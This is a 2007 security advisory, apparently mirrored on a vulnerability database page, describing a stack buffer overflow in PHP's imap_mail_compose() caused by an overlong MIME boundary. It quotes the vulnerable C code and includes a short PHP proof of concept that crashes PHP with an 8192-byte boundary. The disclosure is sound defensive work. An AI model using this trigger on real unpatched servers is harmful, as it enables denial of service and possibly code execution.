Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:16622
HistoryApr 08, 2007 - 12:00 a.m.

MOPB-40-2007:PHP imap_mail_compose() Boundary Stack Buffer Overflow Vulnerability

2007-04-0800:00:00
vulners.com
12
JSON

Summary

The imap_mail_compose() function of PHP that can be used to construct multipart emails will overflow a stack buffer when it is passed an overlong boundary string. This can lead to arbitrary code execution.
Affected versions

Affected are PHP 4 < 4.4.5 and PHP 5 < 5.2.1
Detailed information

The imap_mail_compose() function constructs multipart emails in a fixed size stackbuffer called tmp.

PHP_FUNCTION(imap_mail_compose)
{

char tmp[8 * MAILTMPLEN], *mystring=NULL, *t=NULL, *tempstring=NULL;

When a multipart message is created it first reads the BOUNDARY from the input parameters and simply copies it with a sprintf call into the stack buffer without any size check.

if &#40;bod &amp;&amp; bod-&gt;type == TYPEMULTIPART&#41; {

    /* first body part */
        part = bod-&gt;nested.part;

    /* find cookie */
        for &#40;param = bod-&gt;parameter; param &amp;&amp; !cookie; param = param-&gt;next&#41; {
            if &#40;!strcmp &#40;param-&gt;attribute, &quot;BOUNDARY&quot;&#41;&#41; {
                cookie = param-&gt;value;
            }
        }

    /* yucky default */
        if &#40;!cookie&#41; {
            cookie = &quot;-&quot;;
        }

    /* for each part */
        do {
            t=tmp;
        /* build cookie */
            sprintf &#40;t, &quot;--&#37;s&#37;s&quot;, cookie, CRLF&#41;;

It should be obvious that this allows overflowing the buffer.
Proof of concept, exploit or instructions to reproduce

To test for this vulnerability just try the following piece of code.

<?php

$envelope["from"]= "[email protected]";
$envelope["to"] = "[email protected]";

$part1["type"] = TYPEMULTIPART;
$part1["subtype"] = "mixed";
$part1["type.parameters"] = array("BOUNDARY" => str_repeat("A",8192));

$part2["type"] = TYPETEXT;
$part2["subtype"] = "plain";
$part2["description"] = "description3";
$part2["contents.data"] = "contents.data3\n\n\n\t";

$body[1] = $part1;
$body[2] = $part2;

imap_mail_compose($envelope, $body);

?>

This little POC will only crash PHP. A code execution exploit is however pretty much straight forward. It will be added to the site in the future. So check back soon.
Notes

This vulnerability is just another incarnation of a 08/15 stack based buffer overflow.

JSON